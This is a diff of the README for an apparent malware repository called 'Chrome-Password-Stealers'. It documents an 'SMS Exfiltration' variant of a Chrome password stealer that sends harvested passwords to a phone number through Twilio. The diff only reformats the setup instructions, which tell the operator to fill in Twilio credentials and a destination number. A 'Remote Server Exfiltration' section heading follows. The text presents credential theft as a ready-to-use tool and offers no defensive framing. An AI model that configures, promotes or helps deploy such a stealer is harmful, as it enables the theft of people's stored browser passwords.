Coder-Guy420/Chrome-Password-Stealers/README.md

 SMS Exfiltration
 ----------------
 This does the same thing as stealer.py, but it sends the passwords to a sms phone number.
-You have to repalce 'TWILIO_ACCOUNT_SID' with your Twilio account SID, 'TWILIO_AUTH_TOKEN' with your Twilio account authentication token, 'TWILIO_PHONE_NUMBER' with your Twilio phone number, and 'TARGET_PHONE_NUMBER' with the phone number to which you want to send the SMS message to.
+You have to repalce the following variables:

+'TWILIO_ACCOUNT_SID' with your Twilio account SID

+'TWILIO_AUTH_TOKEN' with your Twilio account authentication token

+'TWILIO_PHONE_NUMBER' with your Twilio phone number

+'TARGET_PHONE_NUMBER' with the phone number to which you want to send the SMS message to

 Remote Server Exfiltration
 --------------------------